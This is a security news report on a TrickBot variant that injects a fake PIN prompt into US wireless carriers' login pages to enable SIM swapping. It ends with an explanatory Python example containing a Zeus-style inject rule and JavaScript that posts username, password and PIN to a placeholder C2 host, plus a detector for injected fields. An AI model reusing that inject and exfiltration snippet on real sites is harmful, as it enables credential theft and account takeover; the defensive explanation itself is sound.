TrickBot Variant Enables SIM Swapping Attacks: Report
Banking Trojan Evolves to Target Wireless Carrier Customers
A new variant of the TrickBot banking Trojan is enabling attackers to conduct SIM swapping schemes against Verizon Wireless, Sprint and T-Mobile customers in the U.S., potentially paving the way for account takeover fraud, according to a report from Dell's SecureWorks division.
The operators of this version of TrickBot are able to intercept a victim's PIN as well as other credentials when the victim attempts to log on to the websites of the three wireless carriers, according to the report.
This enables a SIM swapping attack, in which the victim's phone number is ported to a SIM card under the attackers' control. The attackers can then receive the victim's one-time passwords and SMS-based password resets, or use the stolen account details to socially engineer telecom employees into handing over further information about the victim. These steps create opportunities for follow-on attacks, such as account takeover schemes.
"Interception of short message service (SMS)-based authentication tokens or password resets is frequently used during account takeover fraud," the SecureWorks report notes.
Increase in Account Takeover
Over the past year, SIM swapping has been used in the U.K. for attempted account takeover attacks that have targeted banks and other financial institutions (see: Failed Fraud Against UK Bank Abused Mobile Infrastructure).
Account takeover attacks can also pave the way for credential stuffing, in which stolen username and password pairs are replayed against other sites to gain access to additional accounts and data; the technique works because many people reuse the same credentials across services.
Security vendor Akamai released a study earlier this year that found approximately 30 billion credential stuffing attempts during the course of 2018.
In addition, account takeover attacks are a key component of business email compromise scams, which are on the rise (see: 80 Indicted for Scams, Including Business Email Compromises).
TrickBot Variants
First spotted in the wild in 2016 as a banking Trojan, TrickBot has evolved, with criminal groups adjusting the code to carry out a variety of attacks (see: 5 Malware Trends: Emotet Is Hot, Cryptominers Decline).
Other banking Trojans have also found new purposes. For instance, the Emotet banking Trojan has evolved into a botnet that undergoes a burst of activity every few months, delivering malicious code to victims before quieting down again. In many cases, Emotet is used to deliver TrickBot as well as ransomware (see: Emotet Botnet Shows Signs of Revival).
In its report, SecureWorks says the new version of TrickBot it discovered was developed by a threat group called "Gold Blackburn," but not much is known about the group’s origins or motivations.
The group uses a technique called "web inject": the Trojan, running on the victim's machine, modifies pages from a legitimate website as the browser loads them, inserting the attackers' own HTML or JavaScript code into the page according to instructions fetched from a command-and-control server. The site itself is never compromised; the tampering happens in the victim's browser, so the altered page still appears at the site's real address, according to SecureWorks.
The researchers noticed a TrickBot attack against the Verizon log-in web page on Aug. 5. Then, they discovered an attack against T-Mobile on Aug. 12 and Sprint on Aug. 19, according to the report.
In these attacks, once the injected code is in place, a website user is prompted for a PIN before logging in. In the case of Verizon, the legitimate log-in page doesn't ask for a PIN - only the username and password, according to SecureWorks.
After the victim has entered the PIN, password and username, that data is sent to the attackers' command-and-control server, according to SecureWorks.
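To make the web inject mechanism concrete, here is an added example that is not code from the SecureWorks report, from TrickBot, or from any carrier. It applies a Zeus-style inject rule (set_url / data_before / data_inject / data_after / data_end, the format used by many banking Trojan inject files; whether this variant's files use exactly that syntax is an assumption, not something the report states) to a constructed stand-in for a carrier login page that asks only for username and password. The rule splices in an extra "Account PIN" field and a form-submit handler that would post all three values to a C2 host; the script is inert text here and is never executed. The last function is the check a defender or site owner would want: enumerate the input fields the browser actually rendered and flag any the real form never had. The URL, markup and C2 host are placeholders.

```python
"""Zeus-style web inject applied to a constructed login page (added example)."""
import re
from html.parser import HTMLParser

# Constructed inject rule (assumed Zeus-style syntax). The Trojan matches the
# URL the browser loads, finds data_before in the server's HTML, and splices
# data_inject right after it. '*' is a wildcard in both the URL and data_before.
INJECT_CONFIG = """
set_url https://login.example-carrier.test/* GP
data_before
<input type="password" name="password"*>
data_end
data_inject
<label>Account PIN</label><input type="text" name="pin" maxlength="6">
<script>document.forms[0].addEventListener("submit",function(){
 var f=this;new Image().src="https://c2.example.test/g?u="+encodeURIComponent(f.username.value)
 +"&p="+encodeURIComponent(f.password.value)+"&pin="+encodeURIComponent(f.pin.value);});</script>
data_end
data_after
data_end
"""

# Constructed stand-in for the carrier's real page: username and password only.
ORIGINAL_PAGE = """<html><body>
<form method="post" action="/auth">
<input type="text" name="username">
<input type="password" name="password">
<button type="submit">Sign in</button>
</form></body></html>"""


def parse_injects(config):
    """Parse a Zeus-style inject config into a list of rule dicts."""
    rules = []
    for url_pattern, body in re.findall(r"set_url\s+(\S+)[^\n]*\n(.*?)(?=set_url|\Z)", config, re.S):
        rule = {"url": url_pattern, "data_before": "", "data_inject": "", "data_after": ""}
        for key, val in re.findall(r"(data_before|data_inject|data_after)\n(.*?)data_end", body, re.S):
            rule[key] = val.strip()
        rules.append(rule)
    return rules


def url_matches(pattern, url):
    """Glob-style match: '*' in the set_url pattern matches anything."""
    return re.match("^" + re.escape(pattern).replace(r"\*", ".*") + "$", url) is not None


def apply_injects(rules, url, html):
    """Return the page as the victim's browser would render it after injection."""
    for rule in rules:
        if not url_matches(rule["url"], url):
            continue
        before = re.escape(rule["data_before"]).replace(r"\*", ".*?")
        m = re.search(before, html, re.S)
        if m is None:  # anchor not found on this page: rule does nothing
            continue
        html = html[:m.end()] + "\n" + rule["data_inject"] + html[m.end():]
    return html


class _InputCollector(HTMLParser):
    """Collect the name attribute of every <input> in document order."""
    def __init__(self):
        super().__init__()
        self.fields = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            name = dict(attrs).get("name")
            if name:
                self.fields.append(name)


def form_fields(html):
    p = _InputCollector()
    p.feed(html)
    return p.fields


def unexpected_fields(html, expected=("username", "password")):
    """Fields present in the rendered page that the genuine login form never has."""
    return [f for f in form_fields(html) if f not in expected]


if __name__ == "__main__":
    rules = parse_injects(INJECT_CONFIG)
    tampered = apply_injects(rules, "https://login.example-carrier.test/signin", ORIGINAL_PAGE)
    print(tampered)
    print("unexpected fields:", unexpected_fields(tampered))
```

The point of the check is that the extra PIN field exists only in the victim's DOM, not in the HTML the carrier served, so a comparison between the two (for example, a page integrity script or a user comparing the form against a known-good copy) is what exposes the inject; server-side logs of the legitimate site show nothing unusual.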